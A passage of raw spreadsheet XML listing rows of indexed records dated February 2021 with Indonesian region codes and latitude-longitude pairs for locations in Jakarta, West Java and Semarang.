      <c r="N2864">
        <v>3374130</v>
      </c>
      <c r="O2864">
        <v>3374</v>
      </c>
      <c r="P2864">
        <v>33</v>
      </c>
      <c r="Q2864" t="s">
        <v>9721</v>
      </c>
      <c r="R2864" t="s">
        <v>9633</v>
      </c>
      <c r="S2864" t="s">
        <v>1334</v>
      </c>
      <c r="T2864" t="s">
        <v>1134</v>
      </c>
      <c r="U2864" s="5">
        <v>11042952</v>
      </c>
      <c r="V2864" s="5" t="s">
        <v>17028</v>
      </c>
      <c r="W2864" s="5">
        <v>-696845</v>
      </c>
      <c r="X2864" t="s">
        <v>20766</v>
      </c>
      <c r="Y2864" t="str">
        <f t="shared" si="44"/>
        <v>-6.96845,110.42952</v>
      </c>
    </row>
    <row r="2865" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2865">
        <v>232407</v>
      </c>
      <c r="B2865" s="1">
        <v>44233</v>
      </c>
      <c r="C2865" s="2">
        <v>0.70056712962962964</v>
      </c>
      <c r="D2865" t="s">
        <v>22</v>
      </c>
      <c r="E2865" t="s">
        <v>23</v>
      </c>
      <c r="F2865" t="s">
        <v>9722</v>
      </c>
      <c r="G2865" t="s">
        <v>9723</v>
      </c>
      <c r="H2865" t="s">
        <v>26</v>
      </c>
      <c r="I2865" t="s">
        <v>137</v>
      </c>
      <c r="J2865" t="s">
        <v>9719</v>
      </c>
      <c r="L2865" t="s">
        <v>9724</v>
      </c>
      <c r="M2865">
        <v>3374130008</v>
      </c>
      <c r="N2865">
        <v>3374130</v>
      </c>
      <c r="O2865">
        <v>3374</v>
      </c>
      <c r="P2865">
        <v>33</v>
      </c>
      <c r="Q2865" t="s">
        <v>9721</v>
      </c>
      <c r="R2865" t="s">
        <v>9633</v>
      </c>
      <c r="S2865" t="s">
        <v>1334</v>
      </c>
      <c r="T2865" t="s">
        <v>1134</v>
      </c>
      <c r="U2865" s="5">
        <v>11042952</v>
      </c>
      <c r="V2865" s="5" t="s">
        <v>17028</v>
      </c>
      <c r="W2865" s="5">
        <v>-696845</v>
      </c>
      <c r="X2865" t="s">
        <v>20766</v>
      </c>
      <c r="Y2865" t="str">
        <f t="shared" si="44"/>
        <v>-6.96845,110.42952</v>
      </c>
    </row>
    <row r="2866" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2866">
        <v>232408</v>
      </c>
      <c r="B2866" s="1">
        <v>44233</v>
      </c>
      <c r="C2866" s="2">
        <v>0.73560185185185178</v>
      </c>
      <c r="D2866" t="s">
        <v>22</v>
      </c>
      <c r="E2866" t="s">
        <v>23</v>
      </c>
      <c r="F2866" t="s">
        <v>9725</v>
      </c>
      <c r="G2866" t="s">
        <v>9726</v>
      </c>
      <c r="H2866" t="s">
        <v>26</v>
      </c>
      <c r="I2866" t="s">
        <v>1559</v>
      </c>
      <c r="J2866" t="s">
        <v>2608</v>
      </c>
      <c r="L2866" t="s">
        <v>9727</v>
      </c>
      <c r="M2866">
        <v>3326150011</v>
      </c>
      <c r="N2866">
        <v>3326150</v>
      </c>
      <c r="O2866">
        <v>3326</v>
      </c>
      <c r="P2866">
        <v>33</v>
      </c>
      <c r="Q2866" t="s">
        <v>9728</v>
      </c>
      <c r="R2866" t="s">
        <v>9729</v>
      </c>
      <c r="S2866" t="s">
        <v>6246</v>
      </c>
      <c r="T2866" t="s">
        <v>1134</v>
      </c>
      <c r="U2866" s="5">
        <v>10964637</v>
      </c>
      <c r="V2866" s="5" t="s">
        <v>17029</v>
      </c>
      <c r="W2866" s="5">
        <v>-689970</v>
      </c>
      <c r="X2866" t="s">
        <v>20767</v>
      </c>
      <c r="Y2866" t="str">
        <f t="shared" si="44"/>
        <v>-6.89970,109.64637</v>
      </c>
    </row>
    <row r="2867" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2867">
        <v>232409</v>
      </c>
      <c r="B2867" s="1">
        <v>44233</v>
      </c>
      <c r="C2867" s="2">
        <v>0.7729166666666667</v>
      </c>
      <c r="D2867" t="s">
        <v>2648</v>
      </c>
      <c r="E2867" t="s">
        <v>23</v>
      </c>
      <c r="G2867" t="s">
        <v>9730</v>
      </c>
      <c r="H2867" t="s">
        <v>26</v>
      </c>
      <c r="J2867" t="s">
        <v>2737</v>
      </c>
      <c r="L2867" t="s">
        <v>2794</v>
      </c>
      <c r="M2867">
        <v>3173040001</v>
      </c>
      <c r="N2867">
        <v>3173040</v>
      </c>
      <c r="O2867">
        <v>3173</v>
      </c>
      <c r="P2867">
        <v>31</v>
      </c>
      <c r="Q2867" t="s">
        <v>1598</v>
      </c>
      <c r="R2867" t="s">
        <v>1598</v>
      </c>
      <c r="S2867" t="s">
        <v>62</v>
      </c>
      <c r="T2867" t="s">
        <v>33</v>
      </c>
      <c r="U2867" s="5">
        <v>10685574</v>
      </c>
      <c r="V2867" s="5" t="s">
        <v>16281</v>
      </c>
      <c r="W2867" s="5">
        <v>-618838</v>
      </c>
      <c r="X2867" t="s">
        <v>18868</v>
      </c>
      <c r="Y2867" t="str">
        <f t="shared" si="44"/>
        <v>-6.18838,106.85574</v>
      </c>
    </row>
    <row r="2868" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2868">
        <v>232413</v>
      </c>
      <c r="B2868" s="1">
        <v>44233</v>
      </c>
      <c r="C2868" s="2">
        <v>0.77986111111111101</v>
      </c>
      <c r="D2868" t="s">
        <v>2648</v>
      </c>
      <c r="E2868" t="s">
        <v>23</v>
      </c>
      <c r="G2868" t="s">
        <v>9731</v>
      </c>
      <c r="H2868" t="s">
        <v>26</v>
      </c>
      <c r="J2868" t="s">
        <v>9732</v>
      </c>
      <c r="L2868" t="s">
        <v>9733</v>
      </c>
      <c r="M2868">
        <v>3172070002</v>
      </c>
      <c r="N2868">
        <v>3172070</v>
      </c>
      <c r="O2868">
        <v>3172</v>
      </c>
      <c r="P2868">
        <v>31</v>
      </c>
      <c r="Q2868" t="s">
        <v>128</v>
      </c>
      <c r="R2868" t="s">
        <v>128</v>
      </c>
      <c r="S2868" t="s">
        <v>49</v>
      </c>
      <c r="T2868" t="s">
        <v>33</v>
      </c>
      <c r="U2868" s="5">
        <v>10691909</v>
      </c>
      <c r="V2868" s="5" t="s">
        <v>17030</v>
      </c>
      <c r="W2868" s="5">
        <v>-622466</v>
      </c>
      <c r="X2868" t="s">
        <v>20768</v>
      </c>
      <c r="Y2868" t="str">
        <f t="shared" si="44"/>
        <v>-6.22466,106.91909</v>
      </c>
    </row>
    <row r="2869" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2869">
        <v>232418</v>
      </c>
      <c r="B2869" s="1">
        <v>44233</v>
      </c>
      <c r="C2869" s="2">
        <v>0.78611111111111109</v>
      </c>
      <c r="D2869" t="s">
        <v>2648</v>
      </c>
      <c r="E2869" t="s">
        <v>23</v>
      </c>
      <c r="G2869" t="s">
        <v>9734</v>
      </c>
      <c r="H2869" t="s">
        <v>26</v>
      </c>
      <c r="J2869" t="s">
        <v>9735</v>
      </c>
      <c r="L2869" t="s">
        <v>9736</v>
      </c>
      <c r="M2869">
        <v>3172060006</v>
      </c>
      <c r="N2869">
        <v>3172060</v>
      </c>
      <c r="O2869">
        <v>3172</v>
      </c>
      <c r="P2869">
        <v>31</v>
      </c>
      <c r="Q2869" t="s">
        <v>2800</v>
      </c>
      <c r="R2869" t="s">
        <v>48</v>
      </c>
      <c r="S2869" t="s">
        <v>49</v>
      </c>
      <c r="T2869" t="s">
        <v>33</v>
      </c>
      <c r="U2869" s="5">
        <v>10687289</v>
      </c>
      <c r="V2869" s="5" t="s">
        <v>17031</v>
      </c>
      <c r="W2869" s="5">
        <v>-622095</v>
      </c>
      <c r="X2869" t="s">
        <v>20769</v>
      </c>
      <c r="Y2869" t="str">
        <f t="shared" si="44"/>
        <v>-6.22095,106.87289</v>
      </c>
    </row>
    <row r="2870" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2870">
        <v>232419</v>
      </c>
      <c r="B2870" s="1">
        <v>44233</v>
      </c>
      <c r="C2870" s="2">
        <v>0.79021990740740744</v>
      </c>
      <c r="D2870" t="s">
        <v>22</v>
      </c>
      <c r="E2870" t="s">
        <v>23</v>
      </c>
      <c r="F2870" t="s">
        <v>9737</v>
      </c>
      <c r="G2870" t="s">
        <v>9738</v>
      </c>
      <c r="H2870" t="s">
        <v>26</v>
      </c>
      <c r="I2870" t="s">
        <v>1670</v>
      </c>
      <c r="J2870" t="s">
        <v>3066</v>
      </c>
      <c r="L2870" t="s">
        <v>9739</v>
      </c>
      <c r="M2870">
        <v>3173020001</v>
      </c>
      <c r="N2870">
        <v>3173020</v>
      </c>
      <c r="O2870">
        <v>3173</v>
      </c>
      <c r="P2870">
        <v>31</v>
      </c>
      <c r="Q2870" t="s">
        <v>179</v>
      </c>
      <c r="R2870" t="s">
        <v>179</v>
      </c>
      <c r="S2870" t="s">
        <v>62</v>
      </c>
      <c r="T2870" t="s">
        <v>33</v>
      </c>
      <c r="U2870" s="5">
        <v>10683812</v>
      </c>
      <c r="V2870" s="5" t="s">
        <v>17032</v>
      </c>
      <c r="W2870" s="5">
        <v>-619797</v>
      </c>
      <c r="X2870" t="s">
        <v>20770</v>
      </c>
      <c r="Y2870" t="str">
        <f t="shared" si="44"/>
        <v>-6.19797,106.83812</v>
      </c>
    </row>
    <row r="2871" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2871">
        <v>232420</v>
      </c>
      <c r="B2871" s="1">
        <v>44233</v>
      </c>
      <c r="C2871" s="2">
        <v>0.79274305555555558</v>
      </c>
      <c r="D2871" t="s">
        <v>22</v>
      </c>
      <c r="E2871" t="s">
        <v>23</v>
      </c>
      <c r="F2871" s="3" t="s">
        <v>9740</v>
      </c>
      <c r="H2871" t="s">
        <v>26</v>
      </c>
      <c r="I2871" t="s">
        <v>1009</v>
      </c>
      <c r="J2871" t="s">
        <v>2871</v>
      </c>
      <c r="L2871" t="s">
        <v>9741</v>
      </c>
      <c r="M2871">
        <v>3172080003</v>
      </c>
      <c r="N2871">
        <v>3172080</v>
      </c>
      <c r="O2871">
        <v>3172</v>
      </c>
      <c r="P2871">
        <v>31</v>
      </c>
      <c r="Q2871" t="s">
        <v>2250</v>
      </c>
      <c r="R2871" t="s">
        <v>141</v>
      </c>
      <c r="S2871" t="s">
        <v>49</v>
      </c>
      <c r="T2871" t="s">
        <v>33</v>
      </c>
      <c r="U2871" s="5">
        <v>10695392</v>
      </c>
      <c r="V2871" s="5" t="s">
        <v>17033</v>
      </c>
      <c r="W2871" s="5">
        <v>-619790</v>
      </c>
      <c r="X2871" t="s">
        <v>18959</v>
      </c>
      <c r="Y2871" t="str">
        <f t="shared" si="44"/>
        <v>-6.19790,106.95392</v>
      </c>
    </row>
    <row r="2872" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2872">
        <v>232466</v>
      </c>
      <c r="B2872" s="1">
        <v>44233</v>
      </c>
      <c r="C2872" s="2">
        <v>0.84315972222222213</v>
      </c>
      <c r="D2872" t="s">
        <v>22</v>
      </c>
      <c r="E2872" t="s">
        <v>23</v>
      </c>
      <c r="F2872" t="s">
        <v>9742</v>
      </c>
      <c r="H2872" t="s">
        <v>26</v>
      </c>
      <c r="I2872" t="s">
        <v>27</v>
      </c>
      <c r="J2872" t="s">
        <v>2627</v>
      </c>
      <c r="L2872" t="s">
        <v>9743</v>
      </c>
      <c r="M2872">
        <v>3216100004</v>
      </c>
      <c r="N2872">
        <v>3216100</v>
      </c>
      <c r="O2872">
        <v>3216</v>
      </c>
      <c r="P2872">
        <v>32</v>
      </c>
      <c r="Q2872" t="s">
        <v>9744</v>
      </c>
      <c r="R2872" t="s">
        <v>940</v>
      </c>
      <c r="S2872" t="s">
        <v>41</v>
      </c>
      <c r="T2872" t="s">
        <v>42</v>
      </c>
      <c r="U2872" s="5">
        <v>10699132</v>
      </c>
      <c r="V2872" s="5" t="s">
        <v>17034</v>
      </c>
      <c r="W2872" s="5">
        <v>-612792</v>
      </c>
      <c r="X2872" t="s">
        <v>20771</v>
      </c>
      <c r="Y2872" t="str">
        <f t="shared" si="44"/>
        <v>-6.12792,106.99132</v>
      </c>
    </row>
    <row r="2873" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2873">
        <v>232470</v>
      </c>
      <c r="B2873" s="1">
        <v>44233</v>
      </c>
      <c r="C2873" s="2">
        <v>0.84739583333333324</v>
      </c>
      <c r="D2873" t="s">
        <v>22</v>
      </c>
      <c r="E2873" t="s">
        <v>23</v>
      </c>
      <c r="F2873" t="s">
        <v>9745</v>
      </c>
      <c r="G2873" t="s">
        <v>9746</v>
      </c>
      <c r="H2873" t="s">
        <v>26</v>
      </c>
      <c r="I2873" t="s">
        <v>1633</v>
      </c>
      <c r="J2873" t="s">
        <v>2438</v>
      </c>
      <c r="L2873" t="s">
        <v>9747</v>
      </c>
      <c r="M2873">
        <v>3175050003</v>
      </c>
      <c r="N2873">
        <v>3175050</v>
      </c>
      <c r="O2873">
        <v>3175</v>
      </c>
      <c r="P2873">
        <v>31</v>
      </c>
      <c r="Q2873" t="s">
        <v>1740</v>
      </c>
      <c r="R2873" t="s">
        <v>1013</v>
      </c>
      <c r="S2873" t="s">
        <v>547</v>
      </c>
      <c r="T2873" t="s">
        <v>33</v>
      </c>
      <c r="U2873" s="5">
        <v>10691058</v>
      </c>
      <c r="V2873" s="5" t="s">
        <v>17035</v>
      </c>
      <c r="W2873" s="5">
        <v>-614614</v>
      </c>
      <c r="X2873" t="s">
        <v>20772</v>
      </c>
      <c r="Y2873" t="str">
        <f t="shared" si="44"/>
        <v>-6.14614,106.91058</v>
      </c>
    </row>
    <row r="2874" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2874">
        <v>232498</v>
      </c>
      <c r="B2874" s="1">
        <v>44233</v>
      </c>
      <c r="C2874" s="2">
        <v>0.76597222222222217</v>
      </c>
      <c r="D2874" t="s">
        <v>2648</v>
      </c>
      <c r="E2874" t="s">
        <v>23</v>
      </c>
      <c r="G2874" t="s">
        <v>9748</v>
      </c>
      <c r="H2874" t="s">
        <v>26</v>
      </c>
      <c r="J2874" t="s">
        <v>28</v>
      </c>
      <c r="L2874" t="s">
        <v>9749</v>
      </c>
      <c r="M2874">
        <v>3174020005</v>
      </c>
      <c r="N2874">
        <v>3174020</v>
      </c>
      <c r="O2874">
        <v>3174</v>
      </c>
      <c r="P2874">
        <v>31</v>
      </c>
      <c r="Q2874" t="s">
        <v>30</v>
      </c>
      <c r="R2874" t="s">
        <v>31</v>
      </c>
      <c r="S2874" t="s">
        <v>32</v>
      </c>
      <c r="T2874" t="s">
        <v>33</v>
      </c>
      <c r="U2874" s="5">
        <v>10677048</v>
      </c>
      <c r="V2874" s="5" t="s">
        <v>17036</v>
      </c>
      <c r="W2874" s="5">
        <v>-617040</v>
      </c>
      <c r="X2874" t="s">
        <v>20773</v>
      </c>
      <c r="Y2874" t="str">
        <f t="shared" si="44"/>
        <v>-6.17040,106.77048</v>
      </c>
    </row>
    <row r="2875" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2875">
        <v>232518</v>
      </c>
      <c r="B2875" s="1">
        <v>44233</v>
      </c>
      <c r="C2875" s="2">
        <v>0.89097222222222217</v>
      </c>
      <c r="D2875" t="s">
        <v>2648</v>
      </c>
      <c r="E2875" t="s">
        <v>23</v>
      </c>
      <c r="G2875" t="s">
        <v>9750</v>
      </c>
      <c r="H2875" t="s">
        <v>26</v>
      </c>
      <c r="J2875" t="s">
        <v>1519</v>
      </c>
      <c r="L2875" t="s">
        <v>9751</v>
      </c>
      <c r="M2875">
        <v>3175010003</v>
      </c>
      <c r="N2875">
        <v>3175010</v>
      </c>
      <c r="O2875">
        <v>3175</v>
      </c>
      <c r="P2875">
        <v>31</v>
      </c>
      <c r="Q2875" t="s">
        <v>545</v>
      </c>
      <c r="R2875" t="s">
        <v>546</v>
      </c>
      <c r="S2875" t="s">
        <v>547</v>
      </c>
      <c r="T2875" t="s">
        <v>33</v>
      </c>
      <c r="U2875" s="5">
        <v>10677647</v>
      </c>
      <c r="V2875" s="5" t="s">
        <v>17037</v>
      </c>
      <c r="W2875" s="5">
        <v>-614082</v>
      </c>
      <c r="X2875" t="s">
        <v>20774</v>
      </c>
      <c r="Y2875" t="str">
        <f t="shared" si="44"/>
        <v>-6.14082,106.77647</v>
      </c>
    </row>
    <row r="2876" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2876">
        <v>232726</v>
      </c>
      <c r="B2876" s="1">
        <v>44234</v>
      </c>
      <c r="C2876" s="2">
        <v>3.4722222222222224E-2</v>
      </c>
      <c r="D2876" t="s">
        <v>2648</v>
      </c>
      <c r="E2876" t="s">
        <v>23</v>
      </c>
      <c r="G2876" t="s">
        <v>9752</v>
      </c>
      <c r="H2876" t="s">
        <v>26</v>
      </c>
      <c r="J2876" t="s">
        <v>1605</v>
      </c>
      <c r="L2876" t="s">
        <v>2766</v>
      </c>
      <c r="M2876">
        <v>3174040007</v>
      </c>
      <c r="N2876">
        <v>3174040</v>
      </c>
      <c r="O2876">
        <v>3174</v>
      </c>
      <c r="P2876">
        <v>31</v>
      </c>
      <c r="Q2876" t="s">
        <v>389</v>
      </c>
      <c r="R2876" t="s">
        <v>377</v>
      </c>
      <c r="S2876" t="s">
        <v>32</v>
      </c>
      <c r="T2876" t="s">
        <v>33</v>
      </c>
      <c r="U2876" s="5">
        <v>10678595</v>
      </c>
      <c r="V2876" s="5" t="s">
        <v>17038</v>
      </c>
      <c r="W2876" s="5">
        <v>-614681</v>
      </c>
      <c r="X2876" t="s">
        <v>20775</v>
      </c>
      <c r="Y2876" t="str">
        <f t="shared" si="44"/>
        <v>-6.14681,106.78595</v>
      </c>
    </row>
    <row r="2877" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2877">
        <v>232730</v>
      </c>
      <c r="B2877" s="1">
        <v>44234</v>
      </c>
      <c r="C2877" s="2">
        <v>3.4722222222222224E-2</v>
      </c>
      <c r="D2877" t="s">
        <v>2648</v>
      </c>
      <c r="E2877" t="s">
        <v>23</v>
      </c>
      <c r="G2877" t="s">
        <v>9753</v>
      </c>
      <c r="H2877" t="s">
        <v>26</v>
      </c>
      <c r="J2877" t="s">
        <v>1605</v>
      </c>
      <c r="L2877" t="s">
        <v>2766</v>
      </c>
      <c r="M2877">
        <v>3174040007</v>
      </c>
      <c r="N2877">
        <v>3174040</v>
      </c>
      <c r="O2877">
        <v>3174</v>
      </c>
      <c r="P2877">
        <v>31</v>
      </c>
      <c r="Q2877" t="s">
        <v>389</v>
      </c>
      <c r="R2877" t="s">
        <v>377</v>
      </c>
      <c r="S2877" t="s">
        <v>32</v>
      </c>
      <c r="T2877" t="s">
        <v>33</v>
      </c>
      <c r="U2877" s="5">
        <v>10678623</v>
      </c>
      <c r="V2877" s="5" t="s">
        <v>17039</v>
      </c>
      <c r="W2877" s="5">
        <v>-614760</v>
      </c>
      <c r="X2877" t="s">
        <v>20776</v>
      </c>
      <c r="Y2877" t="str">
        <f t="shared" si="44"/>
        <v>-6.14760,106.78623</v>
      </c>
    </row>
    <row r="2878" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2878">
        <v>232735</v>
      </c>
      <c r="B2878" s="1">
        <v>44234</v>
      </c>
      <c r="C2878" s="2">
        <v>3.6111111111111115E-2</v>
      </c>
      <c r="D2878" t="s">
        <v>2648</v>
      </c>
      <c r="E2878" t="s">
        <v>23</v>
      </c>
      <c r="G2878" t="s">
        <v>9754</v>
      </c>
      <c r="H2878" t="s">
        <v>26</v>
      </c>
      <c r="J2878" t="s">
        <v>404</v>
      </c>
      <c r="L2878" t="s">
        <v>9755</v>
      </c>
      <c r="M2878">
        <v>3174020005</v>
      </c>
      <c r="N2878">
        <v>3174020</v>
      </c>
      <c r="O2878">
        <v>3174</v>
      </c>
      <c r="P2878">
        <v>31</v>
      </c>
      <c r="Q2878" t="s">
        <v>30</v>
      </c>
      <c r="R2878" t="s">
        <v>31</v>
      </c>
      <c r="S2878" t="s">
        <v>32</v>
      </c>
      <c r="T2878" t="s">
        <v>33</v>
      </c>
      <c r="U2878" s="5">
        <v>10676923</v>
      </c>
      <c r="V2878" s="5" t="s">
        <v>16528</v>
      </c>
      <c r="W2878" s="5">
        <v>-616614</v>
      </c>
      <c r="X2878" t="s">
        <v>20777</v>
      </c>
      <c r="Y2878" t="str">
        <f t="shared" si="44"/>
        <v>-6.16614,106.76923</v>
      </c>
    </row>
    <row r="2879" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2879">
        <v>232789</v>
      </c>
      <c r="B2879" s="1">
        <v>44234</v>
      </c>
      <c r="C2879" s="2">
        <v>3.6111111111111115E-2</v>
      </c>
      <c r="D2879" t="s">
        <v>2648</v>
      </c>
      <c r="E2879" t="s">
        <v>23</v>
      </c>
      <c r="G2879" t="s">
        <v>9756</v>
      </c>
      <c r="H2879" t="s">
        <v>26</v>
      </c>
      <c r="J2879" t="s">
        <v>404</v>
      </c>
      <c r="L2879" t="s">
        <v>9757</v>
      </c>
      <c r="M2879">
        <v>3174020005</v>
      </c>
      <c r="N2879">
        <v>3174020</v>
      </c>
      <c r="O2879">
        <v>3174</v>
      </c>
      <c r="P2879">
        <v>31</v>
      </c>
      <c r="Q2879" t="s">
        <v>30</v>
      </c>
      <c r="R2879" t="s">
        <v>31</v>
      </c>
      <c r="S2879" t="s">
        <v>32</v>
      </c>
      <c r="T2879" t="s">
        <v>33</v>
      </c>
      <c r="U2879" s="5">
        <v>10677080</v>
      </c>
      <c r="V2879" s="5" t="s">
        <v>17040</v>
      </c>
      <c r="W2879" s="5">
        <v>-616648</v>
      </c>
      <c r="X2879" t="s">
        <v>20778</v>
      </c>
      <c r="Y2879" t="str">
        <f t="shared" si="44"/>
        <v>-6.16648,106.77080</v>
      </c>
    </row>
    <row r="2880" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2880">
        <v>232797</v>
      </c>
      <c r="B2880" s="1">
        <v>44234</v>
      </c>
      <c r="C2880" s="2">
        <v>1.5972222222222224E-2</v>
      </c>
      <c r="D2880" t="s">
        <v>2648</v>
      </c>
      <c r="E2880" t="s">
        <v>23</v>
      </c>
      <c r="G2880" t="s">
        <v>9758</v>
      </c>
      <c r="H2880" t="s">
        <v>26</v>
      </c>
      <c r="J2880" t="s">
        <v>6426</v>
      </c>
      <c r="L2880" t="s">
        <v>9759</v>
      </c>
      <c r="M2880">
        <v>3174080005</v>
      </c>
      <c r="N2880">
        <v>3174080</v>
      </c>
      <c r="O2880">
        <v>3174</v>
      </c>
      <c r="P2880">
        <v>31</v>
      </c>
      <c r="Q2880" t="s">
        <v>2663</v>
      </c>
      <c r="R2880" t="s">
        <v>695</v>
      </c>
      <c r="S2880" t="s">
        <v>32</v>
      </c>
      <c r="T2880" t="s">
        <v>33</v>
      </c>
      <c r="U2880" s="5">
        <v>10670787</v>
      </c>
      <c r="V2880" s="5" t="s">
        <v>17041</v>
      </c>
      <c r="W2880" s="5">
        <v>-609759</v>
      </c>
      <c r="X2880" t="s">
        <v>20779</v>
      </c>
      <c r="Y2880" t="str">
        <f t="shared" si="44"/>
        <v>-6.09759,106.70787</v>
      </c>
    </row>
    <row r="2881" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2881">
        <v>232918</v>
      </c>
      <c r="B2881" s="1">
        <v>44234</v>
      </c>
      <c r="C2881" s="2">
        <v>0.10591435185185184</v>
      </c>
      <c r="D2881" t="s">
        <v>22</v>
      </c>
      <c r="E2881" t="s">
        <v>23</v>
      </c>
      <c r="F2881" t="s">
        <v>9760</v>
      </c>
      <c r="G2881" t="s">
        <v>9761</v>
      </c>
      <c r="H2881" t="s">
        <v>26</v>
      </c>
      <c r="I2881" t="s">
        <v>1046</v>
      </c>
      <c r="J2881" t="s">
        <v>9762</v>
      </c>
      <c r="L2881" t="s">
        <v>9763</v>
      </c>
      <c r="M2881">
        <v>3374080012</v>
      </c>
      <c r="N2881">
        <v>3374080</v>
      </c>
      <c r="O2881">
        <v>3374</v>
      </c>
      <c r="P2881">
        <v>33</v>
      </c>
      <c r="Q2881" t="s">
        <v>2991</v>
      </c>
      <c r="R2881" t="s">
        <v>2992</v>
      </c>
      <c r="S2881" t="s">
        <v>1334</v>
      </c>
      <c r="T2881" t="s">
        <v>1134</v>
      </c>
      <c r="U2881" s="5">
        <v>11046178</v>
      </c>
      <c r="V2881" s="5" t="s">
        <v>17042</v>
      </c>
      <c r="W2881" s="5">
        <v>-697250</v>
      </c>
      <c r="X2881" t="s">
        <v>20780</v>
      </c>
      <c r="Y2881" t="str">
        <f t="shared" si="44"/>
        <v>-6.97250,110.46178</v>
      </c>
    </row>
    <row r="2882" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2882">
        <v>232919</v>
      </c>
      <c r="B2882" s="1">
        <v>44234</v>
      </c>
      <c r="C2882" s="2">
        <v>0.10833333333333334</v>
      </c>
      <c r="D2882" t="s">
        <v>2648</v>
      </c>
      <c r="E2882" t="s">
        <v>23</v>
      </c>
      <c r="G2882" t="s">
        <v>9764</v>
      </c>
      <c r="H2882" t="s">
        <v>26</v>
      </c>
      <c r="J2882" t="s">
        <v>2688</v>
      </c>
      <c r="L2882" t="s">
        <v>9765</v>
      </c>
      <c r="M2882">
        <v>3174070004</v>
      </c>
      <c r="N2882">
        <v>3174070</v>
      </c>
      <c r="O2882">
        <v>3174</v>
      </c>
      <c r="P2882">
        <v>31</v>
      </c>
      <c r="Q2882" t="s">
        <v>926</v>
      </c>
      <c r="R2882" t="s">
        <v>84</v>
      </c>
      <c r="S2882" t="s">
        <v>32</v>
      </c>
      <c r="T2882" t="s">
        <v>33</v>
      </c>
      <c r="U2882" s="5">
        <v>10673870</v>
      </c>
      <c r="V2882" s="5" t="s">
        <v>14558</v>
      </c>
      <c r="W2882" s="5">
        <v>-615206</v>
      </c>
      <c r="X2882" t="s">
        <v>20781</v>
      </c>
      <c r="Y2882" t="str">
        <f t="shared" si="44"/>
        <v>-6.15206,106.73870</v>
      </c>
    </row>
    <row r="2883" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2883">
        <v>232933</v>
      </c>
      <c r="B2883" s="1">
        <v>44234</v>
      </c>
      <c r="C2883" s="2">
        <v>0.1111111111111111</v>
      </c>
      <c r="D2883" t="s">
        <v>2648</v>
      </c>
      <c r="E2883" t="s">
        <v>23</v>
      </c>
      <c r="G2883" t="s">
        <v>9766</v>
      </c>
      <c r="H2883" t="s">
        <v>26</v>
      </c>
      <c r="J2883" t="s">
        <v>9767</v>
      </c>
      <c r="L2883" t="s">
        <v>9768</v>
      </c>
      <c r="M2883">
        <v>3174070002</v>
      </c>
      <c r="N2883">
        <v>3174070</v>
      </c>
      <c r="O2883">
        <v>3174</v>
      </c>
      <c r="P2883">
        <v>31</v>
      </c>
      <c r="Q2883" t="s">
        <v>621</v>
      </c>
      <c r="R2883" t="s">
        <v>84</v>
      </c>
      <c r="S2883" t="s">
        <v>32</v>
      </c>
      <c r="T2883" t="s">
        <v>33</v>
      </c>
      <c r="U2883" s="5">
        <v>10673096</v>
      </c>
      <c r="V2883" s="5" t="s">
        <v>17043</v>
      </c>
      <c r="W2883" s="5">
        <v>-615556</v>
      </c>
      <c r="X2883" t="s">
        <v>20782</v>
      </c>
      <c r="Y2883" t="str">
        <f t="shared" ref="Y2883:Y2946" si="45">CONCATENATE(X2883,",",V2883)</f>
        <v>-6.15556,106.73096</v>
      </c>
    </row>
    <row r="2884" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2884">
        <v>232943</v>
      </c>
      <c r="B2884" s="1">
        <v>44234</v>
      </c>
      <c r="C2884" s="2">
        <v>0.11527777777777777</v>
      </c>
      <c r="D2884" t="s">
        <v>2648</v>
      </c>
      <c r="E2884" t="s">
        <v>23</v>
      </c>
      <c r="G2884" t="s">
        <v>9769</v>
      </c>
      <c r="H2884" t="s">
        <v>26</v>
      </c>
      <c r="J2884" t="s">
        <v>5881</v>
      </c>
      <c r="L2884" t="s">
        <v>9770</v>
      </c>
      <c r="M2884">
        <v>3174020007</v>
      </c>
      <c r="N2884">
        <v>3174020</v>
      </c>
      <c r="O2884">
        <v>3174</v>
      </c>
      <c r="P2884">
        <v>31</v>
      </c>
      <c r="Q2884" t="s">
        <v>95</v>
      </c>
      <c r="R2884" t="s">
        <v>31</v>
      </c>
      <c r="S2884" t="s">
        <v>32</v>
      </c>
      <c r="T2884" t="s">
        <v>33</v>
      </c>
      <c r="U2884" s="5">
        <v>10676309</v>
      </c>
      <c r="V2884" s="5" t="s">
        <v>17044</v>
      </c>
      <c r="W2884" s="5">
        <v>-616582</v>
      </c>
      <c r="X2884" t="s">
        <v>20783</v>
      </c>
      <c r="Y2884" t="str">
        <f t="shared" si="45"/>
        <v>-6.16582,106.76309</v>
      </c>
    </row>
    <row r="2885" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2885">
        <v>232945</v>
      </c>
      <c r="B2885" s="1">
        <v>44234</v>
      </c>
      <c r="C2885" s="2">
        <v>0.11319444444444444</v>
      </c>
      <c r="D2885" t="s">
        <v>2648</v>
      </c>
      <c r="E2885" t="s">
        <v>23</v>
      </c>
      <c r="G2885" t="s">
        <v>9771</v>
      </c>
      <c r="H2885" t="s">
        <v>26</v>
      </c>
      <c r="J2885" t="s">
        <v>9772</v>
      </c>
      <c r="L2885" t="s">
        <v>9773</v>
      </c>
      <c r="M2885">
        <v>3174070003</v>
      </c>
      <c r="N2885">
        <v>3174070</v>
      </c>
      <c r="O2885">
        <v>3174</v>
      </c>
      <c r="P2885">
        <v>31</v>
      </c>
      <c r="Q2885" t="s">
        <v>1260</v>
      </c>
      <c r="R2885" t="s">
        <v>84</v>
      </c>
      <c r="S2885" t="s">
        <v>32</v>
      </c>
